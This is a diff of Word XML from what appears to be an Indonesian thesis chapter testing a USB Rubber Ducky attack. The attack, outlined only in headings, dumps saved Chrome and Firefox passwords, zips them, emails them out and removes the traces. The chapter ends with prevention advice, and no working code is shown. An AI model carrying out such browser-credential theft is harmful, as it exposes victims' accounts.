+      <w:bookmarkStart w:id="134" w:name="_Toc43087618"/>
+      <w:bookmarkStart w:id="135" w:name="_Toc43087912"/>
+      <w:bookmarkStart w:id="136" w:name="_Toc43258889"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -37601,9 +34468,9 @@
         </w:rPr>
         <w:t>Email</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="118"/>
-      <w:bookmarkEnd w:id="119"/>
-      <w:bookmarkEnd w:id="120"/>
+      <w:bookmarkEnd w:id="134"/>
+      <w:bookmarkEnd w:id="135"/>
+      <w:bookmarkEnd w:id="136"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -37646,7 +34513,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="121" w:name="_Toc43264850"/>
+      <w:bookmarkStart w:id="137" w:name="_Toc43264850"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -37654,7 +34521,7 @@
         <w:lastRenderedPageBreak/>
         <w:t>Pengujian Sistem Dan Analisis</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="121"/>
+      <w:bookmarkEnd w:id="137"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -37671,14 +34538,14 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="122" w:name="_Toc43264851"/>
+      <w:bookmarkStart w:id="138" w:name="_Toc43264851"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
         <w:t>Pengujian Sistem</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="122"/>
+      <w:bookmarkEnd w:id="138"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -37731,7 +34598,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="123" w:name="_Toc43264852"/>
+      <w:bookmarkStart w:id="139" w:name="_Toc43264852"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -37744,7 +34611,7 @@
         </w:rPr>
         <w:t>Membuat Folder Baru</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="123"/>
+      <w:bookmarkEnd w:id="139"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -37865,7 +34732,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="124" w:name="_Toc43258890"/>
+      <w:bookmarkStart w:id="140" w:name="_Toc43258890"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -37917,7 +34784,7 @@
         </w:rPr>
         <w:t>. Membuka CMD Sebagai Admin</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="124"/>
+      <w:bookmarkEnd w:id="140"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -37992,7 +34859,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="125" w:name="_Toc43258891"/>
+      <w:bookmarkStart w:id="141" w:name="_Toc43258891"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -38044,7 +34911,7 @@
         </w:rPr>
         <w:t>. Masuk ke dalam CMD Sebagai Admin</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="125"/>
+      <w:bookmarkEnd w:id="141"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -38225,7 +35092,7 @@
           <w:bCs w:val="0"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="126" w:name="_Toc43258892"/>
+      <w:bookmarkStart w:id="142" w:name="_Toc43258892"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -38294,7 +35161,7 @@
         </w:rPr>
         <w:t>Baru</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="126"/>
+      <w:bookmarkEnd w:id="142"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -38446,7 +35313,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="127" w:name="_Toc43258893"/>
+      <w:bookmarkStart w:id="143" w:name="_Toc43258893"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -38498,7 +35365,7 @@
         </w:rPr>
         <w:t>. Folder Baru Berhasil Dibuat</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="127"/>
+      <w:bookmarkEnd w:id="143"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -38517,7 +35384,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="128" w:name="_Toc43264853"/>
+      <w:bookmarkStart w:id="144" w:name="_Toc43264853"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -38538,7 +35405,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> dari Github</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="128"/>
+      <w:bookmarkEnd w:id="144"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -38733,7 +35600,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="129" w:name="_Toc43258894"/>
+      <w:bookmarkStart w:id="145" w:name="_Toc43258894"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -38819,7 +35686,7 @@
         </w:rPr>
         <w:t>b.ps1</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="129"/>
+      <w:bookmarkEnd w:id="145"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -38882,7 +35749,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="130" w:name="_Toc43258895"/>
+      <w:bookmarkStart w:id="146" w:name="_Toc43258895"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -38952,7 +35819,7 @@
         </w:rPr>
         <w:t>b.ps1 Berhasil Dibuat</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="130"/>
+      <w:bookmarkEnd w:id="146"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -39118,7 +35985,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="131" w:name="_Toc43258896"/>
+      <w:bookmarkStart w:id="147" w:name="_Toc43258896"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -39208,7 +36075,7 @@
         </w:rPr>
         <w:t>Execution Policy</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="131"/>
+      <w:bookmarkEnd w:id="147"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -39327,7 +36194,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="132" w:name="_Toc43258897"/>
+      <w:bookmarkStart w:id="148" w:name="_Toc43258897"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -39397,7 +36264,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> dari Github</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="132"/>
+      <w:bookmarkEnd w:id="148"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -39416,7 +36283,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="133" w:name="_Toc43264854"/>
+      <w:bookmarkStart w:id="149" w:name="_Toc43264854"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -39431,7 +36298,7 @@
         </w:rPr>
         <w:t>Browser</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="133"/>
+      <w:bookmarkEnd w:id="149"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -39623,7 +36490,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="134" w:name="_Toc43258898"/>
+      <w:bookmarkStart w:id="150" w:name="_Toc43258898"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -39675,7 +36542,7 @@
         </w:rPr>
         <w:t>. Perintah Menjalankan Program</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="134"/>
+      <w:bookmarkEnd w:id="150"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -39961,7 +36828,7 @@
           <w:bCs w:val="0"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="135" w:name="_Toc43258899"/>
+      <w:bookmarkStart w:id="151" w:name="_Toc43258899"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -40031,7 +36898,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> pada Google Chrome</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="135"/>
+      <w:bookmarkEnd w:id="151"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -40101,7 +36968,7 @@
           <w:bCs w:val="0"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="136" w:name="_Toc43258900"/>
+      <w:bookmarkStart w:id="152" w:name="_Toc43258900"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -40171,7 +37038,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> pada Mozilla Firefox</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="136"/>
+      <w:bookmarkEnd w:id="152"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -40411,7 +37278,7 @@
           <w:bCs w:val="0"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="137" w:name="_Toc43258901"/>
+      <w:bookmarkStart w:id="153" w:name="_Toc43258901"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -40481,7 +37348,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> .txt</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="137"/>
+      <w:bookmarkEnd w:id="153"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -40661,7 +37528,7 @@
           <w:bCs w:val="0"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="138" w:name="_Toc43258902"/>
+      <w:bookmarkStart w:id="154" w:name="_Toc43258902"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -40713,7 +37580,7 @@
         </w:rPr>
         <w:t>. Tampilan Saat ChromePass.exe Dijalankan</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="138"/>
+      <w:bookmarkEnd w:id="154"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -40775,7 +37642,7 @@
         <w:contextualSpacing w:val="0"/>
         <w:jc w:val="both"/>
       </w:pPr>
-      <w:bookmarkStart w:id="139" w:name="_Hlk43225207"/>
+      <w:bookmarkStart w:id="155" w:name="_Hlk43225207"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -40864,7 +37731,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> seperti pada Gambar V-14 berikut.</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="139"/>
+      <w:bookmarkEnd w:id="155"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -40943,7 +37810,7 @@
           <w:bCs w:val="0"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="140" w:name="_Toc43258903"/>
+      <w:bookmarkStart w:id="156" w:name="_Toc43258903"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -40995,7 +37862,7 @@
         </w:rPr>
         <w:t>. Tampilan Saat PasswordFox.exe Dijalankan</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="140"/>
+      <w:bookmarkEnd w:id="156"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -41259,7 +38126,7 @@
           <w:bCs w:val="0"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="141" w:name="_Toc43258904"/>
+      <w:bookmarkStart w:id="157" w:name="_Toc43258904"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -41321,7 +38188,7 @@
         </w:rPr>
         <w:t>Password</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="141"/>
+      <w:bookmarkEnd w:id="157"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -41339,7 +38206,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="142" w:name="_Toc43264855"/>
+      <w:bookmarkStart w:id="158" w:name="_Toc43264855"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -41360,7 +38227,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> Folder</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="142"/>
+      <w:bookmarkEnd w:id="158"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -41550,7 +38417,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="143" w:name="_Toc43258905"/>
+      <w:bookmarkStart w:id="159" w:name="_Toc43258905"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -41620,7 +38487,7 @@
         </w:rPr>
         <w:t>.txt</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="143"/>
+      <w:bookmarkEnd w:id="159"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -41798,7 +38665,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="144" w:name="_Toc43258906"/>
+      <w:bookmarkStart w:id="160" w:name="_Toc43258906"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -41850,7 +38717,7 @@
         </w:rPr>
         <w:t>. Baris Perintah Menjalankan zipping.ps1</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="144"/>
+      <w:bookmarkEnd w:id="160"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -41985,7 +38852,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="145" w:name="_Toc43258907"/>
+      <w:bookmarkStart w:id="161" w:name="_Toc43258907"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -42055,7 +38922,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> Password.zip Berhasil Dibuat</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="145"/>
+      <w:bookmarkEnd w:id="161"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -42071,7 +38938,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="146" w:name="_Toc43264856"/>
+      <w:bookmarkStart w:id="162" w:name="_Toc43264856"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -42086,7 +38953,7 @@
         </w:rPr>
         <w:t>Email</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="146"/>
+      <w:bookmarkEnd w:id="162"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -42219,7 +39086,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="147" w:name="_Toc43258908"/>
+      <w:bookmarkStart w:id="163" w:name="_Toc43258908"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -42271,7 +39138,7 @@
         </w:rPr>
         <w:t>. Baris Perintah Menjalankan maintenance.ps1</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="147"/>
+      <w:bookmarkEnd w:id="163"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -42417,7 +39284,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="148" w:name="_Toc43258909"/>
+      <w:bookmarkStart w:id="164" w:name="_Toc43258909"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -42487,7 +39354,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> Berhasil Dikirimkan</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="148"/>
+      <w:bookmarkEnd w:id="164"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -42510,14 +39377,14 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="149" w:name="_Toc43264857"/>
+      <w:bookmarkStart w:id="165" w:name="_Toc43264857"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
         <w:t>Pengujian Menghapus Folder</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="149"/>
+      <w:bookmarkEnd w:id="165"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -42622,7 +39489,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="150" w:name="_Toc43258910"/>
+      <w:bookmarkStart w:id="166" w:name="_Toc43258910"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -42674,7 +39541,7 @@
         </w:rPr>
         <w:t>. Baris Perintah Mengakhiri Penyerangan</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="150"/>
+      <w:bookmarkEnd w:id="166"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -42797,14 +39664,14 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="151" w:name="_Toc43264858"/>
+      <w:bookmarkStart w:id="167" w:name="_Toc43264858"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
         <w:t>Kekurangan Sistem</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="151"/>
+      <w:bookmarkEnd w:id="167"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -42839,14 +39706,14 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="152" w:name="_Toc43264859"/>
+      <w:bookmarkStart w:id="168" w:name="_Toc43264859"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
         <w:t>Interupsi</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="152"/>
+      <w:bookmarkEnd w:id="168"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -42959,7 +39826,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="153" w:name="_Toc43264860"/>
+      <w:bookmarkStart w:id="169" w:name="_Toc43264860"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -42968,7 +39835,7 @@
         </w:rPr>
         <w:t>Delay</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="153"/>
+      <w:bookmarkEnd w:id="169"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -43107,14 +39974,14 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="154" w:name="_Toc43264861"/>
+      <w:bookmarkStart w:id="170" w:name="_Toc43264861"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
         <w:t>Koneksi Internet</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="154"/>
+      <w:bookmarkEnd w:id="170"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -43188,14 +40055,14 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="155" w:name="_Toc43264862"/>
+      <w:bookmarkStart w:id="171" w:name="_Toc43264862"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
         <w:t>Analisis</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="155"/>
+      <w:bookmarkEnd w:id="171"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -43284,14 +40151,14 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="156" w:name="_Toc43264863"/>
+      <w:bookmarkStart w:id="172" w:name="_Toc43264863"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
         <w:t>Analisis Rubber Ducky</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="156"/>
+      <w:bookmarkEnd w:id="172"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -43304,6 +40171,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="173" w:name="_Hlk43337500"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -43410,6 +40278,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> detik</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="173"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -43428,6 +40297,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="174" w:name="_Hlk43337535"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -43530,7 +40400,14 @@
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t xml:space="preserve"> yang dikirimkan kosong. Tabel V-1 berikut menampilkan rincian waktu simulasi beserta keterangan </w:t>
+        <w:t xml:space="preserve"> yang dikirimkan kosong.</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="174"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Tabel V-1 berikut menampilkan rincian waktu simulasi beserta keterangan </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -43570,7 +40447,7 @@
           <w:bCs w:val="0"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="157" w:name="_Toc43259322"/>
+      <w:bookmarkStart w:id="175" w:name="_Toc43259322"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -43622,7 +40499,7 @@
         </w:rPr>
         <w:t>. Perbandingan Waktu Penyerangan</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="157"/>
+      <w:bookmarkEnd w:id="175"/>
     </w:p>
     <w:tbl>
       <w:tblPr>
@@ -44750,7 +41627,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="158" w:name="_Toc43264864"/>
+      <w:bookmarkStart w:id="176" w:name="_Toc43264864"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -44763,7 +41640,7 @@
         </w:rPr>
         <w:t>Interupsi</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="158"/>
+      <w:bookmarkEnd w:id="176"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -44776,6 +41653,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="177" w:name="_Hlk43340714"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -44794,7 +41672,21 @@
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t xml:space="preserve"> keyboard yang sudah di program berjalan semua. Gambar V-22 berikut menampilkan program yang </w:t>
+        <w:t xml:space="preserve"> keyboard yang sudah di program berjalan semua.</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="177"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:bookmarkStart w:id="178" w:name="_Hlk43342098"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Gambar V-22 berikut menampilkan program yang </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -44816,6 +41708,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> komputer.</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="178"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -44895,7 +41788,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="159" w:name="_Toc43258911"/>
+      <w:bookmarkStart w:id="179" w:name="_Toc43258911"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -44965,7 +41858,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> saat Program Berjalan</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="159"/>
+      <w:bookmarkEnd w:id="179"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -45018,14 +41911,14 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="160" w:name="_Toc43264865"/>
+      <w:bookmarkStart w:id="180" w:name="_Toc43264865"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
         <w:t>Analisis Pengambilan Data</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="160"/>
+      <w:bookmarkEnd w:id="180"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -45038,6 +41931,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="181" w:name="_Hlk43340750"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -45224,6 +42118,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> agar data yang disimpan dapat dibaca oleh penyerang.</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="181"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -45236,12 +42131,14 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="182" w:name="_Hlk43341960"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
         <w:t>Pada pengujian ini dilakukan beberapa skenario dengan parameter yang berbeda sehingga dapat disesuaikan dengan kondisi komputer target yang beragam seperti yang dicantumkan pada Tabel V-2.</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="182"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -45266,7 +42163,7 @@
           <w:bCs w:val="0"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="161" w:name="_Toc43259323"/>
+      <w:bookmarkStart w:id="183" w:name="_Toc43259323"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -45318,7 +42215,7 @@
         </w:rPr>
         <w:t>. Skenario Pengujian Pengambilan Data</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="161"/>
+      <w:bookmarkEnd w:id="183"/>
     </w:p>
     <w:tbl>
       <w:tblPr>
@@ -45349,6 +42246,7 @@
                 <w:lang w:val="id-ID"/>
               </w:rPr>
             </w:pPr>
+            <w:bookmarkStart w:id="184" w:name="_Hlk43341983"/>
             <w:r>
               <w:rPr>
                 <w:lang w:val="id-ID"/>
@@ -46031,6 +42929,7 @@
           </w:p>
         </w:tc>
       </w:tr>
+      <w:bookmarkEnd w:id="184"/>
     </w:tbl>
     <w:p>
       <w:pPr>
@@ -46171,14 +43070,14 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="162" w:name="_Toc43264866"/>
+      <w:bookmarkStart w:id="185" w:name="_Toc43264866"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
         <w:t>Rekomendasi Untuk Mencegah Penyerangan</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="162"/>
+      <w:bookmarkEnd w:id="185"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -46188,6 +43087,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="186" w:name="_Hlk43342294"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -46250,6 +43150,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> komputer target.</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="186"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -46259,12 +43160,14 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="187" w:name="_Hlk43342304"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
         <w:t>Rekomendasi yang dapat penulis berikan untuk mencegah terjadinya serangan seperti ini terbagi dalam dua aspek, yaitu:</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="187"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -46299,13 +43202,15 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="163" w:name="_Hlk43257822"/>
+      <w:bookmarkStart w:id="188" w:name="_Hlk43257822"/>
+      <w:bookmarkStart w:id="189" w:name="_Hlk43342361"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
         <w:t>Memperhatikan komputer agar tidak dihubungkan dengan perangkat USB yang mencurigakan oleh siapapun</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="189"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -46320,12 +43225,14 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="190" w:name="_Hlk43342370"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
         <w:t>Mematikan atau mengunci komputer apabila akan ditinggalkan dan tidak terjangkau oleh pemilik</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="190"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -46340,6 +43247,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="191" w:name="_Hlk43342378"/>
       <w:r>
